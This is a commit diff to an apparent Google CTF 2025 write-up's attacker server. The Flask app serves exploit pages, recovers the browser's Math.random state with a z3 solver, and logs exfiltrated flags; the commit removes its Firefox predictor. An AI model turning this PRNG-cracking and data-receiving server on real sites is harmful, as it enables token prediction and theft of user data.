Update server.py

b1tsOnTiLT · web-flow · commit 413e287337b2 · 2025-08-12T19:23:27.000+05:30
diff --git a/content/writeups/GoogleCTF2025/postviewer/server.py b/content/writeups/GoogleCTF2025/postviewer/server.py
@@ -149,74 +149,6 @@ def test_chrome_predict():
 
 test_chrome_predict()
 
-# Firefox predictor based on:
-#  - https://github.com/mkutay/spidermonkey-randomness-predictor/blob/main/main.py
-
-def solve_math_random_ff(sequence):
-  solver = z3.Solver()
-
-  se_state0, se_state1 = z3.BitVecs("se_state0 se_state1", 64)
-
-  for i in range(len(sequence)):
-    se_s1 = se_state0
-    se_s0 = se_state1
-    se_s1 ^= se_s1 << 23
-    se_s1 ^= z3.LShR(se_s1, 17)
-    se_s1 ^= se_s0
-    se_s1 ^= z3.LShR(se_s0, 26)
-    se_state0 = se_state1
-    se_state1 = se_s1
-    calc = se_state1 + se_state0
-
-    mantissa = sequence[i] * (0x1 << 53)
-
-    solver.add(int(mantissa) == (calc & 0x1FFFFFFFFFFFFF))
-
-  if solver.check() == z3.sat:
-    model = solver.model()
-
-    states = {}
-    for state in model.decls():
-      states[state.__str__()] = model[state]
-
-    return states["se_state0"].as_long(), states["se_state1"].as_long()
-
-def iter_math_random_ff(state0, state1):
-  MASK = 0xFFFFFFFFFFFFFFFF
-
-  while True:
-    s1 = state0 & MASK
-    s0 = state1 & MASK
-    s1 ^= (s1 << 23) & MASK
-    s1 ^= (s1 >> 17) & MASK
-    s1 ^= s0 & MASK
-    s1 ^= (s0 >> 26) & MASK
-    state0 = state1 & MASK
-    state1 = s1 & MASK
-    gen = (state0 + state1) & MASK
-
-    yield float(gen & 0x1FFFFFFFFFFFFF) / (0x1 << 53)
-
-
-def test_firefox_predict():
-  # A few random numbers generated by Firefox. The predictor should be
-  # able to calculate the last number, given the previous ones.
-  TEST_CASE = [
-    0.8431670449485892,
-    0.43385289233085145,
-    0.7674771743931095,
-    0.9826449278522053,
-    0.867667470753005
-  ]
-
-  state0, state1 = solve_math_random_ff(TEST_CASE[:-1])
-  iter = iter_math_random_ff(state0, state1)
-  preds = [next(iter) for i in range(0,5)]
-
-  assert preds[-1] == TEST_CASE[-1], f"{preds[-1]} != {TEST_CASE[-1]}"
-
-test_firefox_predict()
-
 import itertools
 
 def chunks(s, lengths):
@@ -247,26 +179,13 @@ def chrome_predict_salt(salt, n=5):
     except:
       pass
 
-def firefox_predict_salt(salt, n=5):
-  for lens in itertools.product([11, 10, 12, 9], repeat=5):
-    if sum(lens) != len(salt): continue
-    nums = list(chunks(salt, lens))
-    nums = [base36_to_double(n) for n in nums]
-    # print(nums)
-    try:
-      state0, state1 = solve_math_random_ff(nums)
-      iter = iter_math_random_ff(state0, state1)
-      return [next(iter) for i in range(0,n+5)]
-    except:
-      pass
 
-
-from flask import Flask, send_file
+from flask import Flask, send_file, jsonify 
 import time
-import os # <<< This import is important
+import os
 
-# Get the absolute path of the directory where the script is located
-SCRIPT_DIR = os.path.dirname(os.path.abspath(__file__))
+# : Hardcoded path for the cloud server, edit as per your requirement
+SCRIPT_DIR = '/home/garyalisanat' 
 
 app = Flask(__name__)
 
@@ -281,32 +200,23 @@ def sleep(ms):
 
 @app.route("/exploit-eolldodkgm9")
 def exploit():
-  # Use the absolute path to the file
   return send_file(os.path.join(SCRIPT_DIR, 'exploit-chrome.html'))
 
-@app.route("/exploit-ff-eolldodkgm9")
-def exploitff():
-  # Use the absolute path to the file
-  return send_file(os.path.join(SCRIPT_DIR, 'exploit-firefox.html'))
-
 @app.route("/predict/<salt>")
 def predict(salt):
   predictions = chrome_predict_salt(salt, 5000) or []
-  return predictions
-
-@app.route("/predict-ff/<salt>")
-def predict_ff(salt):
-  predictions = firefox_predict_salt(salt, 5000) or []
-  return predictions
-
+  return jsonify(predictions) 
+  
 @app.route("/test")
 def test():
-  # This file might not exist, but we fix the path anyway
-  return send_file(os.path.join(SCRIPT_DIR, 'test-random.html'))
+  try:
+    return send_file(os.path.join(SCRIPT_DIR, 'test-random.html'))
+  except FileNotFoundError:
+    return "File not found", 404
 
 @app.route("/flag/<flag>")
 def say_flag(flag):
-  print(flag)
+  print("FLAG CAPTURED:", flag)
   return "Hello"
 
 @app.route("/log/<l>")
@@ -315,4 +225,4 @@ def log(l):
   return "Hello"
 
 if __name__ == '__main__':
-   app.run(host='0.0.0.0', port='80')
+    app.run(host='0.0.0.0', port='80')
